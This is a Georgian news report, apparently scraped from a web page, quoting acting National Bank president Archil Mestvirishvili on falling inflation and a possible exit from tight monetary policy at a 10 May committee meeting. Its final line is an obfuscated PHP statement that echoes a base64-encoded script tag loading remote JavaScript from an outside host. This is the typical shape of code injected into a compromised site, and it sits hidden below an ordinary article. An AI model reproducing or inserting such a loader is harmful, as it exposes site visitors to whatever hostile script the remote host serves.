celsiusi
ავერსი საქკაბელი

ჩვენ უნდა დავინახოთ ადგილობრივი ინფლაციის შემცირების ტრენდიც, რომელიც საშუალებას მოგვცემს, დავიწყოთ გამკაცრებული მონეტარული პოლიტიკიდან გამოსვლა, – ამის შესახებ ეროვნული ბანკის პრეზიდენტის მოვალეობის შემსრულებელმა, არჩილ მესტვირიშვილმა განაცხადა.

მესტვირიშვილის თქმით, აპრილის თვის ინფლაციის მაჩვენებლები როდესაც ცნობილი გახდება, სწორედ ეს დაეხმარება ცენტრალურ ბანკს გადაწყვეტილების მიღებაში.

„როგორც ადრე იყო პროგნოზირებული, ინფლაციას გააჩნია შემცირების მკვეთრი ტრენდი და ეს შემდეგ თვეებშიც მოსალოდნელია, რომ გაძლიერდეს. ჩვენ 10 მაისს გვექნება შეხვედრა, ჩანიშნულია მონეტარული პოლიტიკის კომიტეტის სხდომა და მაშინ მივიღებთ უკვე გადაწყვეტილებას, არის თუ არა უკვე დრო, დავიწყოთ გამკაცრებული მონეტარული პოლიტიკიდან გამოსვლა. რა თქმა უნდა, ვაკვირდებით ტენდენციებს და როგორც ჩვენ ადრეც აღვნიშნეთ, ჩვენთვის მნიშვნელოვანია, რა ხდება ადგილობრივი პროდუქციის ინფლაციის კუთხით, რადგან მთლიან ინფლაციას აქვს მკვეთრი შემცირების ტენდენცია, მაგრამ ეს ძირითადად არის იმპორტირებული პროდუქციის ხარჯზე.

ჩვენ უნდა დავინახოთ ადგილობრივი ინფლაციის შემცირების ტრენდიც, რომელიც საშუალებას მოგვცემს, დავიწყოთ გამკაცრებული მონეტარული პოლიტიკიდან გამოსვლა და მიმდინარე თვის ინფლაციის მაჩვენებლები როცა გახდება ცნობილი, ეს იქნება ჩვენთვის დამატებითი ინფორმაცია, რომელიც დაგვეხმარება გადაწყვეტილების მიღებაში“,  – განაცხადა არჩილ მესტვირშვილმა.

328
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");